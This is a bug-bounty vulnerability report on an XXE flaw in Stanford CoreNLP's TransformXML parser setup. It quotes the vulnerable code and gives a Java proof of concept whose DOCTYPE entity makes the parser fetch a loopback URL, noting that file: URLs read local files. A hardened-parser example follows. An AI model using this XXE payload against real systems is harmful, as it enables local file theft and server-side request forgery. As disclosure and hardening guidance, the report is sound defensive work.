huntr - Haxatron - 3D7E70FE-DDDD-4B79-AF62-8E058C4D5763
History: Jan 11, 2022 - 5:14 a.m.

in stanfordnlp/corenlp

2022-01-11 05:14:33
haxatron
www.huntr.dev
xxe attacks
saxparser
ssrf
vulnerability

EPSS

0.001

Percentile

33.4%

Description

TransformXML builds its SAXParser from SAXParserFactory.newInstance() with factory defaults: FEATURE_SECURE_PROCESSING is never enabled and external entity resolution is never disabled, so any XML document passed to it can carry an XXE payload. In

https://github.com/stanfordnlp/CoreNLP/blob/ef9022322c14bbafab18a0002173e56ae377d6ef/src/edu/stanford/nlp/process/TransformXML.java#L196-L203

// Vulnerable construction in TransformXML.java: the factory is used with its defaults,
// so the JDK's built-in parser will resolve external entities declared in a DOCTYPE.
try {
    saxParser = SAXParserFactory.newInstance().newSAXParser();
} catch (Exception e) {
    log.info("Error configuring XML parser: " + e);
    throw new RuntimeException(e);
}

The SAXParser is created without FEATURE_SECURE_PROCESSING and without disabling external general and parameter entities, so a DOCTYPE in attacker-controlled input is honoured and its SYSTEM entities are fetched. Note that enabling FEATURE_SECURE_PROCESSING alone is parser-implementation dependent (the JDK's bundled parser restricts external DTD access when the feature is set explicitly, a standalone Xerces does not); the portable fix is to set disallow-doctype-decl to true, or to disable external-general-entities, external-parameter-entities and load-external-dtd.

Proof of Concept

The parser construction SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser() is extracted into a stand-alone program to show how it can be exploited.

import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.helpers.DefaultHandler;

public class Poc {

    public static void main(String[] args) {
        try {
            // DOCTYPE declares an external general entity pointing at a loopback URL;
            // "&xxe;" in the body forces the parser to resolve (fetch) it.
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
            // Same construction as TransformXML: factory defaults, no hardening.
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            // Any content handler will do; the request is made during parsing, not by the handler.
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes(StandardCharsets.UTF_8)), new DefaultHandler());
        } catch (Exception e) {
            // With nothing listening on 127.0.0.1:80 this prints a ConnectException,
            // which is itself evidence that the parser attempted the outbound request.
            e.printStackTrace();
        }
    }
}

Parsing this document makes the JVM issue an HTTP request to http://127.0.0.1/, i.e. an SSRF from the host running CoreNLP; the same entity mechanism with a file: URL reads local files into the parsed content.
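The following is an added example, not code from the huntr report or from CoreNLP: it places the vulnerable factory construction beside a hardened one and feeds both the same constructed payload. The class and method names (HardenedSaxDemo, defaultParser, hardenedParser, parseWith) are illustrative; the feature URIs are the standard SAX and Apache Xerces ones that the JDK's bundled parser understands.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public class HardenedSaxDemo {

    // Constructed payload with the same shape as the PoC above (external entity, loopback URL).
    static final String XXE_PAYLOAD =
        "<?xml version=\"1.0\"?>"
        + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]>"
        + "<foo>&xxe;</foo>";

    // Constructed benign input to show the hardened parser still works for ordinary documents.
    static final String BENIGN = "<foo>hello</foo>";

    /** Mirrors the vulnerable TransformXML construction: factory defaults, nothing disabled. */
    static SAXParser defaultParser() throws ParserConfigurationException, SAXException {
        return SAXParserFactory.newInstance().newSAXParser();
    }

    /** Hardened factory: DOCTYPE is rejected outright, plus defence-in-depth features
     *  for parsers that do not honour disallow-doctype-decl. */
    static SAXParser hardenedParser() throws ParserConfigurationException, SAXException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Strongest control: any document carrying a DOCTYPE fails before entities are declared.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // If a DOCTYPE must be tolerated elsewhere, these stop external fetches on their own.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f.newSAXParser();
    }

    /** Parses doc with the given parser and reports either the collected text or the rejection. */
    static String parseWith(SAXParser parser, String doc) {
        StringBuilder text = new StringBuilder();
        DefaultHandler handler = new DefaultHandler() {
            @Override
            public void characters(char[] ch, int start, int length) {
                text.append(ch, start, length);
            }
        };
        try {
            InputSource in = new InputSource(
                new ByteArrayInputStream(doc.getBytes(StandardCharsets.UTF_8)));
            parser.parse(in, handler);
            return "parsed: \"" + text + "\"";
        } catch (SAXParseException e) {
            // disallow-doctype-decl surfaces here as a parse error on the DOCTYPE line.
            return "rejected: " + e.getMessage();
        } catch (Exception e) {
            // For the default parser this is typically a ConnectException from the entity fetch.
            return "error: " + e;
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("hardened, benign : " + parseWith(hardenedParser(), BENIGN));
        System.out.println("hardened, XXE    : " + parseWith(hardenedParser(), XXE_PAYLOAD));
        // The default parser really does attempt the HTTP request to 127.0.0.1, exactly like
        // the PoC, so it only runs when explicitly requested.
        if (args.length > 0 && args[0].equals("--unsafe")) {
            System.out.println("default, XXE     : " + parseWith(defaultParser(), XXE_PAYLOAD));
        }
    }
}
```

Run with `java HardenedSaxDemo` to see the hardened parser accept the benign document and reject the payload at the DOCTYPE; add `--unsafe` to watch the default-configured parser attempt the loopback connection. Rejecting DOCTYPE entirely is the right default for a library like CoreNLP whose input never legitimately needs a DTD; the three entity/DTD features are the fallback for code paths that must accept a DOCTYPE.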

Impact

An attacker who can supply XML to TransformXML can use XXE to read local files into the parsed content, make the CoreNLP host issue requests to internal services (SSRF), or cause denial of service through entity expansion.
